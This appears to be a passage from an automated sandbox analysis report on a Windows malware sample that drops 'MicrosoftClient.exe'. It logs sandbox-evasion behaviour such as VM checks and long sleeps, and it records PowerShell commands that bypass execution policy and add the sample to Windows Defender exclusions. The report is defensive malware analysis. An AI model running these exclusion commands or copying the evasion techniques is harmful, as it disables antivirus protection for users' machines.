Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Memory allocated: 1450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Memory allocated: 1B020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Memory allocated: 1160000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Memory allocated: 1ABD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Memory allocated: 2C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Memory allocated: 1AE40000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Window / User API: threadDelayed 9665	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3743	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6046	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7349	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2208	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7702	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1978	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7435
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2220

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe TID: 2348	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3492	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1052	Thread sleep count: 7435 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208	Thread sleep count: 2220 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 364	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe TID: 5192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe TID: 612	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Thread delayed: delay time: 922337203685477

Source: 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001BFBC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Queries volume information: C:\Users\user\Desktop\9RgE5uOJwX.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
